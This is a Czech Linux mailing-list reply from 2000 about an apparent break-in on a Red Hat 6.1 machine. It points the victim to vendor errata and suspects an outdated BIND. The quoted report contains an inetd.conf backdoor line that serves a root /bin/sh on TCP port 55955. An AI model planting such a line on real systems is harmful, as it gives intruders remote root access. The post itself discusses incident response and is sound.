Bezpecnostni dira v RH 6.1 ?
Petr Novotny
Petr.Novotny na antek.cz
Úterý Duben 25 10:40:30 CEST 2000
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On 25 Apr 00, at 10:33, Petr Kincl wrote:
> Dobry den.
> Neni nejaka velka bezpecnostni dira v RH 6.1 CZ z Computer Pressu?
Co takhle
http://www.redhat.com/support/errata/rh61-errata-general.html
> Stalo se mi, ze se nekdo naboural na muj stroj, pridal si do
> inetd.conf radek 55955 tcp stream nowait root /bin/sh -i a tim se stal
> panem celeho PC. Jsem si jisty, ze heslo roota urcite neznal.
:-)
Podivejte se na uvedeny link; fixu v kategorii "bezpecnost" je
patnact. [Vetsina se tyka lokalnich exploitu za divnych podminek;
u vas jde spis o remote exploit (proc by jinak radka v inetd.conf,
ze?) - co takhle stary BIND? _Delal_ jste upgrade BINDu? A
nastavil jste, aby BIND nebezel jako root?]
"Secure by default installation"... Hm, ne na RedHatu. Ach jo.
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2 -- QDPGP 2.60
Comment: http://community.wow.net/grt/qdpgp.html
iQA/AwUBOQVL7lMwP8g7qbw/EQKiFQCfRJdbkCwXch991kg1XTSHHKeq5bwAoPEF
SYeAHs1UEchNu0tAecSBjG6A
=7q2O
-----END PGP SIGNATURE-----
--
Petr Novotny, ANTEK CS
Petr.Novotny na antek.cz
http://www.antek.cz
PGP key ID: 0x3BA9BC3F
-- Don't you know there ain't no devil there's just God when he's drunk.
[Tom Waits]
Další informace o konferenci Linux